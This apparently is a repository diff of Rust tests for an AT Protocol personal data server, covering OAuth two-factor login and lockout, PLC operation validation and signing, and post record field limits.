    let auth_client = no_redirect_client();
    let auth_res = auth_client
        .post(format!("{}/oauth/authorize", url))
        .form(&[
            ("request_uri", request_uri),
            ("username", &handle),
            ("password", password),
            ("remember_device", "false"),
        ])
        .send()
        .await
        .unwrap();
    assert!(auth_res.status().is_redirection());
    // The challenge code is generated server-side (presumably delivered via
    // the user's notification channel); the test reads it straight from the
    // challenge table instead.
    let twofa_code: String = sqlx::query_scalar(
        "SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1"
    )
    .bind(request_uri)
    .fetch_one(&pool)
    .await
    .expect("Failed to get 2FA code from database");
    let twofa_res = auth_client
        .post(format!("{}/oauth/authorize/2fa", url))
        .form(&[
            ("request_uri", request_uri),
            ("code", &twofa_code),
        ])
        .send()
        .await
        .unwrap();
    assert!(
        twofa_res.status().is_redirection(),
        "Valid 2FA code should redirect to success, got status: {}",
        twofa_res.status()
    );
    let location = twofa_res.headers().get("location").unwrap().to_str().unwrap();
    assert!(
        location.starts_with(redirect_uri),
        "Should redirect to client callback, got: {}",
        location
    );
    assert!(
        location.contains("code="),
        "Redirect should include authorization code"
    );
    // Extract the authorization code from the callback URL and exchange it.
    let auth_code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
    let token_res = http_client
        .post(format!("{}/oauth/token", url))
        .form(&[
            ("grant_type", "authorization_code"),
            ("code", auth_code),
            ("redirect_uri", redirect_uri),
            ("code_verifier", &code_verifier),
            ("client_id", &client_id),
        ])
        .send()
        .await
        .unwrap();
    assert_eq!(token_res.status(), StatusCode::OK, "Token exchange should succeed");
    let token_body: Value = token_res.json().await.unwrap();
    assert!(token_body["access_token"].is_string());
    assert_eq!(token_body["sub"], user_did);
}
/// Five wrong 2FA codes exhaust the attempt budget; a further submission must
/// be refused (lockout message or challenge gone) instead of re-prompting.
#[tokio::test]
async fn test_2fa_lockout_after_max_attempts() {
    let url = base_url().await;
    let http_client = client();
    // Unique handle/email per run so repeated executions don't collide.
    let ts = Utc::now().timestamp_millis();
    let handle = format!("2fa-lockout-{}", ts);
    let email = format!("2fa-lockout-{}@example.com", ts);
    let password = "2fa-test-password";
    let create_res = http_client
        .post(format!("{}/xrpc/com.atproto.server.createAccount", url))
        .json(&json!({
            "handle": handle,
            "email": email,
            "password": password
        }))
        .send()
        .await
        .unwrap();
    assert_eq!(create_res.status(), StatusCode::OK);
    let account: Value = create_res.json().await.unwrap();
    let user_did = account["did"].as_str().unwrap();
    // Enable 2FA directly in the database (no enrollment step in this flow).
    let db_url = common::get_db_connection_string().await;
    let pool = sqlx::postgres::PgPoolOptions::new()
        .max_connections(1)
        .connect(&db_url)
        .await
        .expect("Failed to connect to database");
    sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
        .bind(user_did)
        .execute(&pool)
        .await
        .expect("Failed to enable 2FA");
    // PAR + PKCE to obtain a pending request_uri for the authorization.
    let redirect_uri = "https://example.com/2fa-lockout-callback";
    let mock_client = setup_mock_client_metadata(redirect_uri).await;
    let client_id = mock_client.uri();
    let (_, code_challenge) = generate_pkce();
    let par_body: Value = http_client
        .post(format!("{}/oauth/par", url))
        .form(&[
            ("response_type", "code"),
            ("client_id", &client_id),
            ("redirect_uri", redirect_uri),
            ("code_challenge", &code_challenge),
            ("code_challenge_method", "S256"),
        ])
        .send()
        .await
        .unwrap()
        .json()
        .await
        .unwrap();
    let request_uri = par_body["request_uri"].as_str().unwrap();
    // Password step succeeds, putting the request into the 2FA-pending state.
    let auth_client = no_redirect_client();
    let auth_res = auth_client
        .post(format!("{}/oauth/authorize", url))
        .form(&[
            ("request_uri", request_uri),
            ("username", &handle),
            ("password", password),
            ("remember_device", "false"),
        ])
        .send()
        .await
        .unwrap();
    assert!(auth_res.status().is_redirection());
    // Burn all five attempts with a wrong code. Attempts 1-4 must re-render
    // the form with an error; the 5th (i == 4) may already hit the lockout
    // path, so its body is deliberately not asserted.
    for i in 0..5 {
        let res = http_client
            .post(format!("{}/oauth/authorize/2fa", url))
            .form(&[
                ("request_uri", request_uri),
                ("code", "999999"),
            ])
            .send()
            .await
            .unwrap();
        if i < 4 {
            assert_eq!(res.status(), StatusCode::OK, "Attempt {} should show error page", i + 1)
;
            let body = res.text().await.unwrap();
            assert!(
                body.contains("Invalid verification code"),
                "Should show invalid code error on attempt {}", i + 1
            );
        }
    }
    // A sixth submission must be refused outright.
    let lockout_res = http_client
        .post(format!("{}/oauth/authorize/2fa", url))
        .form(&[
            ("request_uri", request_uri),
            ("code", "999999"),
        ])
        .send()
        .await
        .unwrap();
    assert_eq!(lockout_res.status(), StatusCode::OK);
    let body = lockout_res.text().await.unwrap();
    // Body is truncated in the failure message to keep test output readable.
    assert!(
        body.contains("Too many failed attempts") || body.contains("No 2FA challenge found"),
        "Should be locked out after max attempts. Body: {}",
        &body[..body.len().min(500)]
    );
}
/// A remembered device lets the account selector skip the password prompt,
/// but once 2FA is enabled, selecting the account must still route through
/// the 2FA page before an authorization code is issued.
#[tokio::test]
async fn test_account_selector_with_2fa_requires_verification() {
    let url = base_url().await;
    let http_client = client();
    // Unique handle/email per run so repeated executions don't collide.
    let ts = Utc::now().timestamp_millis();
    let handle = format!("selector-2fa-{}", ts);
    let email = format!("selector-2fa-{}@example.com", ts);
    let password = "selector-2fa-password";
    let create_res = http_client
        .post(format!("{}/xrpc/com.atproto.server.createAccount", url))
        .json(&json!({
            "handle": handle,
            "email": email,
            "password": password
        }))
        .send()
        .await
        .unwrap();
    assert_eq!(create_res.status(), StatusCode::OK);
    let account: Value = create_res.json().await.unwrap();
    let user_did = account["did"].as_str().unwrap().to_string();
    // First authorization: PAR + PKCE, then log in with remember_device=true
    // so the server hands back a device cookie for the account selector.
    let redirect_uri = "https://example.com/selector-2fa-callback";
    let mock_client = setup_mock_client_metadata(redirect_uri).await;
    let client_id = mock_client.uri();
    let (code_verifier, code_challenge) = generate_pkce();
    let par_body: Value = http_client
        .post(format!("{}/oauth/par", url))
        .form(&[
            ("response_type", "code"),
            ("client_id", &client_id),
            ("redirect_uri", redirect_uri),
            ("code_challenge", &code_challenge),
            ("code_challenge_method", "S256"),
        ])
        .send()
        .await
        .unwrap()
        .json()
        .await
        .unwrap();
    let request_uri = par_body["request_uri"].as_str().unwrap();
    let auth_client = no_redirect_client();
    let auth_res = auth_client
        .post(format!("{}/oauth/authorize", url))
        .form(&[
            ("request_uri", request_uri),
            ("username", &handle),
            ("password", password),
            ("remember_device", "true"),
        ])
        .send()
        .await
        .unwrap();
    assert!(auth_res.status().is_redirection());
    // Keep only the "name=value" part of the Set-Cookie header for replay.
    let device_cookie = auth_res.headers()
        .get("set-cookie")
        .and_then(|v| v.to_str().ok())
        .map(|s| s.split(';').next().unwrap_or("").to_string())
        .expect("Should have received device cookie")
;
    let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
    assert!(location.contains("code="), "First auth should succeed");
    // Complete the first grant (2FA not yet enabled) via the token endpoint.
    let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
    let _token_body: Value = http_client
        .post(format!("{}/oauth/token", url))
        .form(&[
            ("grant_type", "authorization_code"),
            ("code", code),
            ("redirect_uri", redirect_uri),
            ("code_verifier", &code_verifier),
            ("client_id", &client_id),
        ])
        .send()
        .await
        .unwrap()
        .json()
        .await
        .unwrap();
    // Now enable 2FA directly in the database before the second authorization.
    let db_url = common::get_db_connection_string().await;
    let pool = sqlx::postgres::PgPoolOptions::new()
        .max_connections(1)
        .connect(&db_url)
        .await
        .expect("Failed to connect to database");
    sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
        .bind(&user_did)
        .execute(&pool)
        .await
        .expect("Failed to enable 2FA");
    // Second authorization request with fresh PKCE material.
    let (code_verifier2, code_challenge2) = generate_pkce();
    let par_body2: Value = http_client
        .post(format!("{}/oauth/par", url))
        .form(&[
            ("response_type", "code"),
            ("client_id", &client_id),
            ("redirect_uri", redirect_uri),
            ("code_challenge", &code_challenge2),
            ("code_challenge_method", "S256"),
        ])
        .send()
        .await
        .unwrap()
        .json()
        .await
        .unwrap();
    let request_uri2 = par_body2["request_uri"].as_str().unwrap();
    // Pick the account via the selector, authenticated only by device cookie.
    let select_res = auth_client
        .post(format!("{}/oauth/authorize/select", url))
        .header("cookie", &device_cookie)
        .form(&[
            ("request_uri", request_uri2),
            ("did", &user_did),
        ])
        .send()
        .await
        .unwrap();
    assert!(
        select_res.status().is_redirection(),
        "Account selector should redirect, got status: {}",
        select_res.status()
    );
    // The remembered device must NOT bypass 2FA.
    let select_location = select_res.headers().get("location").unwrap().to_str().unwrap();
    assert!(
        select_location.contains("/oauth/authorize/2fa"),
        "Account selector with 2FA enabled should redirect to 2FA page, got: {}",
        select_location
    );
    // Read the server-generated challenge code straight from the database.
    let twofa_code: String = sqlx::query_scalar(
        "SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1"
    )
    .bind(request_uri2)
    .fetch_one(&pool)
    .await
    .expect("Failed to get 2FA code");
    let twofa_res = auth_client
        .post(format!("{}/oauth/authorize/2fa", url))
        .header("cookie", &device_cookie)
        .form(&[
            ("request_uri", request_uri2),
            ("code", &twofa_code),
        ])
        .send()
        .await
        .unwrap();
    assert!(twofa_res.status().is_redirection());
    let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap();
    assert!(
        final_location.starts_with(redirect_uri) && final_location.contains("code="),
        "After 2FA, should redirect to client with code, got: {}",
        final_location
    );
    // Exchange the final authorization code and confirm the token subject.
    let final_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap();
    let token_res = http_client
        .post(format!("{}/oauth/token", url))
        .form(&[
            ("grant_type", "authorization_code"),
            ("code", final_code),
            ("redirect_uri", redirect_uri),
            ("code_verifier", &code_verifier2),
            ("client_id", &client_id),
        ])
        .send()
        .await
        .unwrap();
    assert_eq!(token_res.status(), StatusCode::OK);
    let final_token: Value = token_res.json().await.unwrap();
    assert_eq!(final_token["sub"], user_did, "Token should be for the correct user");
}

View File

@@ -735,6 +735,7 @@ async fn test_security_deactivated_account_blocked() {
let auth_res = http_client
.post(format!("{}/oauth/authorize", url))
.header("Accept", "application/json")
.form(&[
("request_uri", request_uri),
("username", &handle),

View File

@@ -255,6 +255,7 @@ async fn test_full_plc_operation_flow() {
}
#[tokio::test]
#[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_consumes_token -- --ignored --test-threads=1"]
async fn test_sign_plc_operation_consumes_token() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
@@ -902,6 +903,7 @@ async fn test_migration_rejects_wrong_did_document() {
}
#[tokio::test]
#[ignore = "requires exclusive env var access; run with: cargo test test_full_migration_flow_end_to_end -- --ignored --test-threads=1"]
async fn test_full_migration_flow_end_to_end() {
let client = client();
let (token, did) = create_account_and_login(&client).await;

513
tests/plc_validation.rs Normal file
View File

@@ -0,0 +1,513 @@
use bspds::plc::{
PlcError, PlcOperation, PlcService, PlcValidationContext,
cid_for_cbor, sign_operation, signing_key_to_did_key,
validate_plc_operation, validate_plc_operation_for_submission,
verify_operation_signature,
};
use k256::ecdsa::SigningKey;
use serde_json::json;
use std::collections::HashMap;
/// Builds and signs a minimal, structurally complete PLC operation whose
/// rotation key and `atproto` verification method are one fresh secp256k1 key.
fn create_valid_operation() -> serde_json::Value {
    let signing_key = SigningKey::random(&mut rand::thread_rng());
    let did_key = signing_key_to_did_key(&signing_key);
    let unsigned = json!({
        "type": "plc_operation",
        "rotationKeys": [did_key.clone()],
        "verificationMethods": {
            "atproto": did_key
        },
        "alsoKnownAs": ["at://test.handle"],
        "services": {
            "atproto_pds": {
                "type": "AtprotoPersonalDataServer",
                "endpoint": "https://pds.example.com"
            }
        },
        "prev": null
    });
    sign_operation(&unsigned, &signing_key).unwrap()
}
/// A fully populated, signed operation passes structural validation.
#[test]
fn test_validate_plc_operation_valid() {
    let operation = create_valid_operation();
    assert!(
        validate_plc_operation(&operation).is_ok(),
        "structurally valid signed operation should validate"
    );
}
/// An operation without a `type` field is rejected with a "Missing type" error.
#[test]
fn test_validate_plc_operation_missing_type() {
    let malformed = json!({
        "rotationKeys": [],
        "verificationMethods": {},
        "alsoKnownAs": [],
        "services": {},
        "sig": "test"
    });
    match validate_plc_operation(&malformed) {
        Err(PlcError::InvalidResponse(msg)) => {
            assert!(msg.contains("Missing type"), "unexpected message: {}", msg)
        }
        _ => panic!("expected InvalidResponse for missing type"),
    }
}
/// A `type` other than "plc_operation" is rejected as an invalid type.
#[test]
fn test_validate_plc_operation_invalid_type() {
    let malformed = json!({
        "type": "invalid_type",
        "sig": "test"
    });
    match validate_plc_operation(&malformed) {
        Err(PlcError::InvalidResponse(msg)) => {
            assert!(msg.contains("Invalid type"), "unexpected message: {}", msg)
        }
        _ => panic!("expected InvalidResponse for invalid type"),
    }
}
/// An unsigned operation (no `sig` field) fails structural validation.
#[test]
fn test_validate_plc_operation_missing_sig() {
    let malformed = json!({
        "type": "plc_operation",
        "rotationKeys": [],
        "verificationMethods": {},
        "alsoKnownAs": [],
        "services": {}
    });
    match validate_plc_operation(&malformed) {
        Err(PlcError::InvalidResponse(msg)) => {
            assert!(msg.contains("Missing sig"), "unexpected message: {}", msg)
        }
        _ => panic!("expected InvalidResponse for missing sig"),
    }
}
/// Dropping `rotationKeys` yields a structural error naming the field.
#[test]
fn test_validate_plc_operation_missing_rotation_keys() {
    let malformed = json!({
        "type": "plc_operation",
        "verificationMethods": {},
        "alsoKnownAs": [],
        "services": {},
        "sig": "test"
    });
    match validate_plc_operation(&malformed) {
        Err(PlcError::InvalidResponse(msg)) => {
            assert!(msg.contains("rotationKeys"), "unexpected message: {}", msg)
        }
        _ => panic!("expected InvalidResponse for missing rotationKeys"),
    }
}
/// Dropping `verificationMethods` yields a structural error naming the field.
#[test]
fn test_validate_plc_operation_missing_verification_methods() {
    let malformed = json!({
        "type": "plc_operation",
        "rotationKeys": [],
        "alsoKnownAs": [],
        "services": {},
        "sig": "test"
    });
    match validate_plc_operation(&malformed) {
        Err(PlcError::InvalidResponse(msg)) => {
            assert!(msg.contains("verificationMethods"), "unexpected message: {}", msg)
        }
        _ => panic!("expected InvalidResponse for missing verificationMethods"),
    }
}
/// Dropping `alsoKnownAs` yields a structural error naming the field.
#[test]
fn test_validate_plc_operation_missing_also_known_as() {
    let malformed = json!({
        "type": "plc_operation",
        "rotationKeys": [],
        "verificationMethods": {},
        "services": {},
        "sig": "test"
    });
    match validate_plc_operation(&malformed) {
        Err(PlcError::InvalidResponse(msg)) => {
            assert!(msg.contains("alsoKnownAs"), "unexpected message: {}", msg)
        }
        _ => panic!("expected InvalidResponse for missing alsoKnownAs"),
    }
}
/// Dropping `services` yields a structural error naming the field.
#[test]
fn test_validate_plc_operation_missing_services() {
    let malformed = json!({
        "type": "plc_operation",
        "rotationKeys": [],
        "verificationMethods": {},
        "alsoKnownAs": [],
        "sig": "test"
    });
    match validate_plc_operation(&malformed) {
        Err(PlcError::InvalidResponse(msg)) => {
            assert!(msg.contains("services"), "unexpected message: {}", msg)
        }
        _ => panic!("expected InvalidResponse for missing services"),
    }
}
/// Submission validation requires the server's rotation key to appear in
/// `rotationKeys`; an operation listing only the user's key is rejected.
#[test]
fn test_validate_rotation_key_required() {
    let user_key = SigningKey::random(&mut rand::thread_rng());
    let user_did_key = signing_key_to_did_key(&user_key);
    let server_key = "did:key:zServer123";
    let operation = json!({
        "type": "plc_operation",
        "rotationKeys": [user_did_key.clone()],
        "verificationMethods": {"atproto": user_did_key.clone()},
        "alsoKnownAs": ["at://test.handle"],
        "services": {
            "atproto_pds": {
                "type": "AtprotoPersonalDataServer",
                "endpoint": "https://pds.example.com"
            }
        },
        "sig": "test"
    });
    let context = PlcValidationContext {
        server_rotation_key: server_key.to_string(),
        expected_signing_key: user_did_key.clone(),
        expected_handle: "test.handle".to_string(),
        expected_pds_endpoint: "https://pds.example.com".to_string(),
    };
    match validate_plc_operation_for_submission(&operation, &context) {
        Err(PlcError::InvalidResponse(msg)) => {
            assert!(msg.contains("rotation key"), "unexpected message: {}", msg)
        }
        _ => panic!("expected rejection when server rotation key is absent"),
    }
}
/// The `atproto` verification method must equal the expected signing key;
/// a mismatched key is rejected with a message naming the signing key.
#[test]
fn test_validate_signing_key_match() {
    let user_key = SigningKey::random(&mut rand::thread_rng());
    let user_did_key = signing_key_to_did_key(&user_key);
    let wrong_key = "did:key:zWrongKey456";
    let operation = json!({
        "type": "plc_operation",
        "rotationKeys": [user_did_key.clone()],
        "verificationMethods": {"atproto": wrong_key},
        "alsoKnownAs": ["at://test.handle"],
        "services": {
            "atproto_pds": {
                "type": "AtprotoPersonalDataServer",
                "endpoint": "https://pds.example.com"
            }
        },
        "sig": "test"
    });
    let context = PlcValidationContext {
        server_rotation_key: user_did_key.clone(),
        expected_signing_key: user_did_key.clone(),
        expected_handle: "test.handle".to_string(),
        expected_pds_endpoint: "https://pds.example.com".to_string(),
    };
    match validate_plc_operation_for_submission(&operation, &context) {
        Err(PlcError::InvalidResponse(msg)) => {
            assert!(msg.contains("signing key"), "unexpected message: {}", msg)
        }
        _ => panic!("expected rejection for mismatched signing key"),
    }
}
#[test]
fn test_validate_handle_match() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {"atproto": did_key.clone()},
"alsoKnownAs": ["at://wrong.handle"],
"services": {
"atproto_pds": {
"type": "AtprotoPersonalDataServer",
"endpoint": "https://pds.example.com"
}
},
"sig": "test"
});
let ctx = PlcValidationContext {
server_rotation_key: did_key.clone(),
expected_signing_key: did_key.clone(),
expected_handle: "test.handle".to_string(),
expected_pds_endpoint: "https://pds.example.com".to_string(),
};
let result = validate_plc_operation_for_submission(&op, &ctx);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
}
#[test]
fn test_validate_pds_service_type() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {"atproto": did_key.clone()},
"alsoKnownAs": ["at://test.handle"],
"services": {
"atproto_pds": {
"type": "WrongServiceType",
"endpoint": "https://pds.example.com"
}
},
"sig": "test"
});
let ctx = PlcValidationContext {
server_rotation_key: did_key.clone(),
expected_signing_key: did_key.clone(),
expected_handle: "test.handle".to_string(),
expected_pds_endpoint: "https://pds.example.com".to_string(),
};
let result = validate_plc_operation_for_submission(&op, &ctx);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
}
#[test]
fn test_validate_pds_endpoint_match() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {"atproto": did_key.clone()},
"alsoKnownAs": ["at://test.handle"],
"services": {
"atproto_pds": {
"type": "AtprotoPersonalDataServer",
"endpoint": "https://wrong.endpoint.com"
}
},
"sig": "test"
});
let ctx = PlcValidationContext {
server_rotation_key: did_key.clone(),
expected_signing_key: did_key.clone(),
expected_handle: "test.handle".to_string(),
expected_pds_endpoint: "https://pds.example.com".to_string(),
};
let result = validate_plc_operation_for_submission(&op, &ctx);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
}
// Round-trip: sign an op with a fresh secp256k1 key, then verify it against
// that same key listed in rotationKeys — expect Ok(true).
#[test]
fn test_verify_signature_secp256k1() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"prev": null
});
let signed = sign_operation(&op, &key).unwrap();
let rotation_keys = vec![did_key];
let result = verify_operation_signature(&signed, &rotation_keys);
assert!(result.is_ok());
assert!(result.unwrap());
}
// Signature produced by one key but checked against a different rotation key:
// verification completes without error but reports no match (Ok(false)).
#[test]
fn test_verify_signature_wrong_key() {
let key = SigningKey::random(&mut rand::thread_rng());
let other_key = SigningKey::random(&mut rand::thread_rng());
let other_did_key = signing_key_to_did_key(&other_key);
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"prev": null
});
let signed = sign_operation(&op, &key).unwrap();
let wrong_rotation_keys = vec![other_did_key];
let result = verify_operation_signature(&signed, &wrong_rotation_keys);
assert!(result.is_ok());
assert!(!result.unwrap());
}
// An unparsable entry in the rotation-key list yields Ok(false) (no match),
// not an Err — malformed keys evidently don't abort verification.
#[test]
fn test_verify_signature_invalid_did_key_format() {
let key = SigningKey::random(&mut rand::thread_rng());
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"prev": null
});
let signed = sign_operation(&op, &key).unwrap();
let invalid_keys = vec!["not-a-did-key".to_string()];
let result = verify_operation_signature(&signed, &invalid_keys);
assert!(result.is_ok());
assert!(!result.unwrap());
}
// A plc_tombstone needs only `prev` and `sig`; the plc_operation field
// requirements (rotationKeys, services, ...) do not apply to it.
#[test]
fn test_tombstone_validation() {
let op = json!({
"type": "plc_tombstone",
"prev": "bafyreig6xxxxxyyyyyzzzzzz",
"sig": "test"
});
let result = validate_plc_operation(&op);
assert!(result.is_ok());
}
// Same input must always hash to the same CID, and the prefix pins the
// expected codec/hash combination (dag-cbor + sha-256 => "bafyrei...").
#[test]
fn test_cid_for_cbor_deterministic() {
let value = json!({
"alpha": 1,
"beta": 2
});
let cid1 = cid_for_cbor(&value).unwrap();
let cid2 = cid_for_cbor(&value).unwrap();
assert_eq!(cid1, cid2, "CID generation should be deterministic");
assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)");
}
// Distinct payloads must not collide.
#[test]
fn test_cid_different_for_different_data() {
let value1 = json!({"data": 1});
let value2 = json!({"data": 2});
let cid1 = cid_for_cbor(&value1).unwrap();
let cid2 = cid_for_cbor(&value2).unwrap();
assert_ne!(cid1, cid2, "Different data should produce different CIDs");
}
// did:key encoding sanity: multibase "z" prefix and a plausible length.
#[test]
fn test_signing_key_to_did_key_format() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z");
assert!(did_key.len() > 50, "Did key should be reasonably long");
}
// Injectivity (probabilistic): two random keys should not share a did:key.
#[test]
fn test_signing_key_to_did_key_unique() {
let key1 = SigningKey::random(&mut rand::thread_rng());
let key2 = SigningKey::random(&mut rand::thread_rng());
let did1 = signing_key_to_did_key(&key1);
let did2 = signing_key_to_did_key(&key2);
assert_ne!(did1, did2, "Different keys should produce different did:keys");
}
// Determinism: encoding the same key twice yields the same did:key.
#[test]
fn test_signing_key_to_did_key_consistent() {
let key = SigningKey::random(&mut rand::thread_rng());
let did1 = signing_key_to_did_key(&key);
let did2 = signing_key_to_did_key(&key);
assert_eq!(did1, did2, "Same key should produce same did:key");
}
// Signing must strip any pre-existing `sig` before computing the new one,
// so a stale signature can never survive into the signed output.
#[test]
fn test_sign_operation_removes_existing_sig() {
let key = SigningKey::random(&mut rand::thread_rng());
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"prev": null,
"sig": "old_signature"
});
let signed = sign_operation(&op, &key).unwrap();
let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap();
assert_ne!(new_sig, "old_signature", "Should replace old signature");
}
// Non-object JSON (here a bare string) is rejected outright.
#[test]
fn test_validate_plc_operation_not_object() {
let result = validate_plc_operation(&json!("not an object"));
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
}
// Submission checks target plc_operation fields; a tombstone carries none of
// them and must pass the submission validator as-is.
#[test]
fn test_validate_for_submission_tombstone_passes() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let op = json!({
"type": "plc_tombstone",
"prev": "bafyreig6xxxxxyyyyyzzzzzz",
"sig": "test"
});
let ctx = PlcValidationContext {
server_rotation_key: did_key.clone(),
expected_signing_key: did_key,
expected_handle: "test.handle".to_string(),
expected_pds_endpoint: "https://pds.example.com".to_string(),
};
let result = validate_plc_operation_for_submission(&op, &ctx);
assert!(result.is_ok(), "Tombstone should pass submission validation");
}
// An operation with no `sig` field cannot be verified; the error names it.
#[test]
fn test_verify_signature_missing_sig() {
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {}
});
let result = verify_operation_signature(&op, &[]);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
}
// A `sig` that is not valid base64 is an InvalidResponse error, not Ok(false).
#[test]
fn test_verify_signature_invalid_base64() {
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"sig": "not-valid-base64!!!"
});
let result = verify_operation_signature(&op, &[]);
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
}
// Serde mapping sanity: the typed PlcOperation serializes with the wire
// field names (`type`, camelCase `rotationKeys`), matching the JSON form
// used throughout the other tests.
#[test]
fn test_plc_operation_struct() {
let mut services = HashMap::new();
services.insert("atproto_pds".to_string(), PlcService {
service_type: "AtprotoPersonalDataServer".to_string(),
endpoint: "https://pds.example.com".to_string(),
});
let mut verification_methods = HashMap::new();
verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string());
let op = PlcOperation {
op_type: "plc_operation".to_string(),
rotation_keys: vec!["did:key:zTest123".to_string()],
verification_methods,
also_known_as: vec!["at://test.handle".to_string()],
services,
prev: None,
sig: Some("test".to_string()),
};
let json_value = serde_json::to_value(&op).unwrap();
assert_eq!(json_value["type"], "plc_operation");
assert!(json_value["rotationKeys"].is_array());
}

590
tests/record_validation.rs Normal file
View File

@@ -0,0 +1,590 @@
use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid};
use serde_json::json;
/// Current UTC time as an RFC 3339 string, used as `createdAt` in fixtures.
fn now() -> String {
    let timestamp = chrono::Utc::now();
    timestamp.to_rfc3339()
}
// Minimal well-formed post (text + createdAt) validates.
#[test]
fn test_validate_post_valid() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Hello world!",
"createdAt": now()
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
// `text` is required.
#[test]
fn test_validate_post_missing_text() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"createdAt": now()
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text"));
}
// `createdAt` is required.
#[test]
fn test_validate_post_missing_created_at() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Hello"
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt"));
}
// Text limit boundary: 3001 chars rejected...
#[test]
fn test_validate_post_text_too_long() {
let validator = RecordValidator::new();
let long_text = "a".repeat(3001);
let post = json!({
"$type": "app.bsky.feed.post",
"text": long_text,
"createdAt": now()
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text"));
}
// ...while exactly 3000 chars is accepted (inclusive limit).
#[test]
fn test_validate_post_text_at_limit() {
let validator = RecordValidator::new();
let limit_text = "a".repeat(3000);
let post = json!({
"$type": "app.bsky.feed.post",
"text": limit_text,
"createdAt": now()
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
// `langs` boundary: 4 entries rejected, 3 accepted.
#[test]
fn test_validate_post_too_many_langs() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Hello",
"createdAt": now(),
"langs": ["en", "fr", "de", "es"]
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
}
#[test]
fn test_validate_post_three_langs_ok() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Hello",
"createdAt": now(),
"langs": ["en", "fr", "de"]
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
// `tags` boundary: 9 entries rejected, 8 accepted.
#[test]
fn test_validate_post_too_many_tags() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Hello",
"createdAt": now(),
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"]
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
}
#[test]
fn test_validate_post_eight_tags_ok() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Hello",
"createdAt": now(),
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"]
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
// Individual tag over 640 chars is rejected; error path is indexed (tags/N).
#[test]
fn test_validate_post_tag_too_long() {
let validator = RecordValidator::new();
let long_tag = "t".repeat(641);
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Hello",
"createdAt": now(),
"tags": [long_tag]
});
let result = validator.validate(&post, "app.bsky.feed.post");
